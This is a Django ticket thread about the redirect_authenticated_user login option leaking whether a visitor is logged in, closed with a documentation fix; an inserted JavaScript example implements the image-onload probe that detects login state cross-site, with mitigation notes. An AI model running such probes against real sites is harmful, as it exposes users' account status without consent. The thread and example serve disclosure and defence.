Django 1.10 introduced `redirect_authenticated_user` to the login views. A
report I came across the other day (https://robinlinus.github.io/socialmedia-leak/)
points out that redirects on GET for authenticated users can potentially be
used to gain the login state of a user for a site.
I believe we should warn users about that issue. Reverting
10781b4c6ff981f581157957d221e7621e0bf4ed (#12233) doesn't seem necessary
to me. It is a useful feature if you know you don't serve image files from
those domains.
--
Ticket URL: <https://code.djangoproject.com/ticket/27352>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.
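The probe the linked report describes, written out as an added example (it is not code from the ticket, the report or Django): an attacker page embeds the victim site's login URL in an <img> with `next=` pointing at an image on the same host. For an anonymous visitor the login view answers 200 text/html and the image errors; for a logged-in visitor with `redirect_authenticated_user` enabled the view redirects to the image and onload fires. The host https://victim.example, the path /static/img/logo.png and the `fakeLoader` that stands in for the browser plus the view's decision are assumptions made for this example.

```javascript
// Added example, not Django or ticket code. Hypothetical victim host and image.
const LOGIN_URL = 'https://victim.example/accounts/login/';
const IMAGE_PATH = '/static/img/logo.png';

// Build the login URL with next= pointing at an image on the victim's host.
function probeUrl(loginUrl, imagePath) {
  const u = new URL(loginUrl);
  u.searchParams.set('next', imagePath);
  return u.toString();
}

// Browser-side loader: an <img> fires onload only if the final response
// (after the 302 from the login view) decodes as an image. The login form
// (200 text/html) fires onerror instead. Cookies ride along with the request.
function browserImageLoads(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = url;
  });
}

// The leak: onload vs onerror maps directly to logged-in vs logged-out.
// `loader` is injectable so the logic can be exercised outside a browser.
async function probeLoginState(loginUrl, imagePath, loader = browserImageLoads) {
  const loaded = await loader(probeUrl(loginUrl, imagePath));
  return loaded ? 'logged-in' : 'logged-out';
}

// Offline stand-in for browser + login view, constructed for this example.
// It models the view's decision: redirect only when the session is
// authenticated and redirect_authenticated_user is on, honour next= only
// when it stays on the same host (Django's safe-URL check), and treat the
// redirect target as "an image" by extension. Anything else is HTML.
function fakeLoader(sessionLoggedIn, redirectAuthenticatedUser) {
  return async (url) => {
    const u = new URL(url);
    if (!(sessionLoggedIn && redirectAuthenticatedUser)) {
      return false; // login form rendered: not an image, onerror
    }
    const target = new URL(u.searchParams.get('next') || '/', u.origin);
    if (target.origin !== u.origin) {
      return false; // unsafe next: view falls back to LOGIN_REDIRECT_URL (HTML)
    }
    return /\.(png|jpe?g|gif|webp)$/i.test(target.pathname);
  };
}

// In a real attacker page this is all that is needed:
//   probeLoginState(LOGIN_URL, IMAGE_PATH).then(state => report(state));
```

Two things worth checking on your own deployment: the probe only works if some image (static file, avatar, favicon) is served from the same host as the login view, because Django refuses an off-host `next`; and a session cookie carrying SameSite=Lax is not sent on a cross-site <img> request at all, so the view then sees an anonymous user and the probe always reports logged-out.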
* needs_docs: 1 => 0
* has_patch: 0 => 1
Comment:
PR: https://github.com/django/django/pull/7403
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:1>
* stage: Unreviewed => Ready for checkin
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:2>
* status: assigned => closed
* resolution: => fixed
Comment:
In [changeset:"b5fc192b99ce92a7ccad08cca7b59b1a4e7ca230" b5fc192]:
{{{
Fixed #27352 -- Doc'd social media fingerprinting consideration with
login's redirect_authenticated_user.
}}}
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:3>
Comment (by Tim Graham <timograham@…>):
In [changeset:"d3ca2907789c348bb132dfd112379df07db0cbbf" d3ca2907]:
{{{
[1.10.x] Fixed #27352 -- Doc'd social media fingerprinting consideration
with login's redirect_authenticated_user.
Backport of b5fc192b99ce92a7ccad08cca7b59b1a4e7ca230 from master
}}}
--
Ticket URL: <https://code.djangoproject.com/ticket/27352#comment:4>